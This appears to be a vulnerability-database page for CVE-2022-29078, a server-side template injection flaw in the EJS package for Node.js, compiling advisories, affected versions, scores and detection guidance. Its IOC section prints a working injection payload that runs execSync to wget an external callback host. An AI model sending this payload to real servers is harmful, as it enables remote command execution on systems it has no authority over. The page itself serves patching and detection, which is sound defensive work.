CVE-2022-29078
published 2022-04-25CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
32.39%
98.1th percentile
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-ejs | < node-ejs 3.1.7-1 (bookworm) | node-ejs 3.1.7-1 (bookworm) |
| ejs | ejs | — | — |
| ejs | ejs | >= 0 < 3.1.7 | 3.1.7 |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
commandsettings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('wget+http://{{interactsh-url}}');s
path/page?id=<randstr>&settings[view options][outputFunctionName]=<payload>
- →Detect SSTI exploitation attempts targeting the EJS outputFunctionName parameter via HTTP query string. Look for the pattern 'settings[view' or 'outputFunctionName' in URL query parameters, especially combined with Node.js process/child_process invocations. ↗
- →Monitor HTTP requests containing URL-encoded child_process or execSync strings in query parameters, which indicate active exploitation of CVE-2022-29078 RCE payload delivery.
- →Alert on HTTP responses containing 'You are viewing page number' as a confirmation of successful EJS template rendering, which can be used to confirm a vulnerable EJS endpoint.
- →Out-of-band (OOB) HTTP callback detection: exploitation payloads use wget or similar tools to beacon to an external URL. Monitor for unexpected outbound HTTP requests from Node.js/EJS application processes.
- ·The vulnerability is specific to EJS version 3.1.6 for Node.js. Versions 3.1.7 and above (and Debian-patched 2.5.7-3+deb11u1) are not affected. Ensure version fingerprinting is part of detection triage. ↗
- ·The attack vector requires the application to pass user-controlled input into EJS render settings (specifically the 'view options' namespace). Applications that do not expose this parameter path are not exploitable even on vulnerable EJS versions. ↗
- ·Several Red Hat packages are listed as 'Not affected' or 'Will not fix', meaning presence of EJS 3.1.6 in a container image does not automatically imply exploitability — context of how EJS is invoked matters. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
ejs template injection vulnerability
ghsa·2022-04-26
CVE-2022-29078 [CRITICAL] CWE-74 ejs template injection vulnerability
ejs template injection vulnerability
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
OSV
ejs template injection vulnerability
osv·2022-04-26
CVE-2022-29078 [CRITICAL] ejs template injection vulnerability
ejs template injection vulnerability
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
OSV
CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3
osv·2022-04-25·CVSS 9.8
CVE-2022-29078 [CRITICAL] CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
VulnCheck
ejs ejs Improper Control of Generation of Code ('Code Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-29078 [CRITICAL] ejs ejs Improper Control of Generation of Code ('Code Injection')
ejs ejs Improper Control of Generation of Code ('Code Injection')
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
Affected: ejs ejs
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-09-18&host_type=src&vulnerability=cve-2022-29078; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-0
Red Hat
ejs: server-side template injection in outputFunctionName
vendor_redhat·2022-04-25·CVSS 9.8
CVE-2022-29078 [CRITICAL] CWE-74 ejs: server-side template injection in outputFunctionName
ejs: server-side template injection in outputFunctionName
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
A Command injection attack was found in ejs (Embedded JavaScript templates) for Node.js, which allows an attacker to execute server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command executed upon template compilation.
Package: rhmtc/openshift-migration-ui-rhel8 (Migration Toolkit for Containe
Debian
CVE-2022-29078: node-ejs - The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows ser...
vendor_debian·2022·CVSS 9.8
CVE-2022-29078 [CRITICAL] CVE-2022-29078: node-ejs - The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows ser...
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
Scope: local
bookworm: resolved (fixed in 3.1.7-1)
bullseye: resolved (fixed in 2.5.7-3+deb11u1)
forky: resolved (fixed in 3.1.7-1)
sid: resolved (fixed in 3.1.7-1)
trixie: resolved (fixed in 3.1.7-1)
No detection rules found.
Nuclei
Node.js Embedded JavaScript 3.1.6 - Template Injection
nuclei·CVSS 9.8
CVE-2022-29078 [CRITICAL] Node.js Embedded JavaScript 3.1.6 - Template Injection
Node.js Embedded JavaScript 3.1.6 - Template Injection
Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
Template:
id: CVE-2022-29078
info:
name: Node.js Embedded JavaScript 3.1.6 - Template Injection
author: For3stCo1d
severity: critical
description: |
Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
impa
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
ZeroDayBench: Evaluating LLM Agents on Unseen Zero-Day Vulnerabilities for Cyberdefense
arxiv_fulltext·2026-03-02
ZeroDayBench: Evaluating LLM Agents on Unseen Zero-Day Vulnerabilities for Cyberdefense
## Abstract
Large language models (LLMs) are increasingly being deployed as software engineering agents that autonomously contribute to repositories. A major benefit these agents present is their ability to find and patch security vulnerabilities in the codebases they oversee. To estimate the capability of agents in this domain, we introduce ZeroDayBench, a benchmark where LLM agents find and patch 22 novel critical vulnerabilities in open-source codebases. We focus our efforts on three popular frontier agentic LLMs: GPT-5.2, Claude Sonnet 4.5, and Grok 4.1. We find that frontier LLMs are not yet capable of autonomously solving our tasks and observe some behavioral patterns that suggest how these models can be improved in the domain of proactive cyberdefense.
## Introduction
Large langu
https://eslam.io/posts/ejs-server-side-template-injection-rce/https://github.com/mde/ejs/releaseshttps://security.netapp.com/advisory/ntap-20220804-0001/https://eslam.io/posts/ejs-server-side-template-injection-rce/https://github.com/mde/ejs/releaseshttps://security.netapp.com/advisory/ntap-20220804-0001/
2022-04-25
Published
Exploited in the wild